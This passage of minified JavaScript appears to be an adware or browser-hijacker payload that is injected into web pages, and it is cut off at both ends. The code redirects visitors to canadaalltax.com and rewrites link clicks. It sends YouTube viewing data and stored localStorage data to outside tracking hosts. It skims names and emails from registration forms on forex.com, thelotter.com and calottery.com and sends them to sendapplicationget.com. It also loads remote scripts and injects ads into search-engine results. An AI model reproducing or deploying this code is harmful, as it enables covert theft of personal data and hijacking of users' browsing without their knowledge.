minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&eid=678&hid=11910493070053587494&pid=1&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},l=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");if(a&&a[1]&&a[1].innerHTML)return(a=a[1].innerHTML.replace(/[^0-9]/g,\"\"))||0;if(a&&a[0]&&a[0].innerHTML||(a=document.getElementsByClassName(\"_mov\"))&&a[0]&&a[0].innerHTML)return(a=a[0].innerHTML.replace(/[^0-9]/g,\"\"))||0};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var e=document.getElementsByTagName(\"body\")[0];if(!e.getAttribute(\"wyttb\")){e.setAttribute(\"wyttb\",\"1\");var f=g(),d=h(),m=k(),n=l();f&&d&&d&&((new Image).src=\"https://score.transferin.in/v.php?id=\"+f+\"&n=\"+d+\"&c=\"+m+\"&s=\"+n+\"&cb=24.182.40.206\")}}catch(p){}})();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ZsD3oYDl=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ZsD3oYDl=\")){var d=a.match(/ZsD3oYDl=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd97qHYMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjw4rja9pjrEqHaEqjr8pdC9pjn=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&eid=678&hid=11910493070053587494&pid=1&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rTnKrjYGvTnEvTsEqV1Fqda4qTs5pdg4&eid=678&hid=11910493070053587494&pid=1&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=10760544854221721801&CTID=p1&partnername=saviinshop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=678_1&hid=11910493070053587494&bname=saviinshop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=678_1&hid=11910493070053587494&bname=saviinshop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"saviinshop\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function©{return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=a.dhtml_prop_name(b);return\"object\"==typeof c.currentStyle&&null!=c.currentStyle&&\"undefined\"!=typeof c.currentStyle[b]?c.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=11910493070053587494&eid=678&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault(): a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}]; for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"== a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom= function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a; c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\", function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b= a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick(); b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c, function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var 